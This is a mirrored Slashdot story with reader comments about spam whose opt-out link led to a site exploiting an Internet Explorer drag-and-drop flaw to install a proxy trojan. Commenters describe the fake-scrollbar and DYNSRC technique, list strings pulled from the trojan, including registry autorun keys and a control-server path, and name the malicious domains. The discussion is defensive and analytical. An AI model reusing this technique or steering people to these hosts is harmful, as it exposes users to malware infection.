Slashdot Mirror

← Back to Stories (view on slashdot.org)

Spam Opt-out Link Triggers Malicious Code Attack

Posted by timothy on from the how-totally-amazing dept.

Maestro4k writes "The Register is reporting on a new spam E-mail circulating out there. In it, clicking on the 'Click here to remove' link launches a site, that when the user scrolls the page, triggers a drag-drop javascript exploit. Scarily the E-mail actually complies with the CAN-SPAM act as it only requires spammers to put an opt-out link in their mailings. As The Reg says "It comes as little surprise that this feature is been taken advantage of in a social engineering exploit; but it does illustrate the security problems of the opt-out approach that were always apparent to security experts - and ignored by legislators." The link in questions points to www. xcelent.biz (As in The Reg story, space intentionally included) so even if you can't block the mail yet it should be easy to block access to the site with the exploit. I suspect this is just the beginning and most spam will include "features" such as this in the near future."

12 of 327 comments (clear)

  1. devious by hendridm · · Score: 4, Informative

    Fortunately, there is a patch for it, Mozilla is unaffected, and Norton and McAfee (at minimum) seem to detect it. That just leaves the millions of unpatched Windows machines that are running out-dated or low-grade antivirus!

  2. I dont know about you by OverlordQ · · Score: 4, Informative
    but my AntiVirus has detected this exploit for a *long* time.

    JS/Exploit-DragDrop.b.gen
    --
    Your hair look like poop, Bob! - Wanker.
    1. Re:I dont know about you by orangesquid · · Score: 4, Informative

      A simple string analysis of the trojan reveals some intimidating-looking strings:
      GetSystemDirectoryA, xProxyBot v 1.0.0, 1.0.0 , w32.exe,
      Windows Service Application, www.earthlabs.biz,
      sockproxy/rec.php.
      Software\M icrosoft\Windows\ CurrentVersion\Run
      Software\Microsoft\Windows\ CurrentVersion\RunServices
      %s?&p=%d&v=%s
      VisitWe bPageThread , Socket4RandomThread, Socket4ServerThread
      SYSTEM\CurrentControlSet\ Control\SafeBoot\
      explorer.exe
      Mozilla/4.0 (compatible)
      InternetCloseHandle, InternetGetLast ResponseInfoA
      InternetReadFile , InternetCrackUrlA
      InternetOpenUrlA
      InternetOpenA , InternetConnectA
      FtpPutFileA, FtpGetFileA
      HttpSendRequestA, HttpOpenRequestA
      InternetGet ConnectedStateEx, InternetGetConnected State

      --
      --TheOrangeSquid Is it any wonder things seem so awry? We swim in a sea of confusion and don't have to think to survive
  3. Re:Microsoft says "No Problem" by Anonymous Coward · · Score: 5, Informative

    Here is the pertinent CERT advisory for this flaw.

    The idea is that all the website designer has to do is make an image that LOOKs like a scrollbar. The user goes and clicks and drags it to scroll down, not knowing it's fake. If there is a DYNSRC="..." attribute specified in the <IMG...> tag, Internet Explorer downloads and runs whatever program is specified, without any kinds of prompts whatsoever.

    Even with SP2 installed.

  4. New News? by Kartik3 · · Score: 5, Informative

    Spammers have often used an "unsubscribe" link or something similar only to verify your email address and send you more spam. While not the same as triggering an exploit, I've been under the impression that spammers have taken advantage of users with an "opt out" type of link in this way for quite a while now.

  5. lamer is hosted on hinet.com by Indy1 · · Score: 4, Informative

    host www.xcelent.biz
    www.xcelent.biz has address 61.218.79.53
    host 61.218.79.53
    53.79.218.61.in-addr.arpa domain name pointer 61-218-79-53.HINET-IP.hinet.net

    and people wonder why i firewall 60/7

    --
    Lawyers, MBA's, RIAA? A jedi fears not these things!
  6. Exploit by jargoone · · Score: 5, Informative

    The article didn't give much explanation about the drag-and-drop exploit itself. Understandably, given the audience, but I was curious. Here's a good link: http://xforce.iss.net/xforce/xfdb/13679

  7. Even better - choose a link with graphics on. by cliveholloway · · Score: 4, Informative
    After a little guessing:

    a b c d. "d" looks pretty heavy on graphics.

    .02

    cLive ;-)

    --
    -- Trinity in high heels carrying a whip: The donimatrix - there is no spoonerism
  8. Re:Dumb by Benanov · · Score: 5, Informative

    That comment means it was ripped from a proof-of-concept website published a while ago: http://www.mikx.de/scrollbar/ Amazingly shameless. They stole this guy's code, AND they're using it for phishing attacks.

  9. Other sites on same server doing the same thing. by Chatmag · · Score: 4, Informative

    There is a slew of sites on that same server according to Webhosting Info that are infected, some with windows-update.exe and others with windows-update32.exe

    --
    Pete Carr Owner Chatmag.com
  10. Hazardous link by abb3w · · Score: 4, Informative
    Now, now, there might be someone who might go to that page with IE. However, no doubt the Slashdot community would be interested in attempting their own effort at reverse engineering the trojan that they want you to download.

    Of course, anyone who installs that on a non-isolated, non-virtual machine pretty much deserves the results. It looks like it has the standard "Software\Microsoft\Windows\Current Version\Run", "Software\Microsoft\Windows\Current Version\RunServices", and "SYSTEM\CurrentControlSet\Control\SafeBoot\" registry hooks. (Unix "strings" is your friend....)

    --
    //Information does not want to be free; it wants to breed.
  11. Re:But then again . . . by mdfst13 · · Score: 5, Informative

    http://www.xcelent.biz/d/ is a link to another page in that domain. Also has more graphics for better slashdotting potential.

    P.S. Still be careful. They could always move the pages around.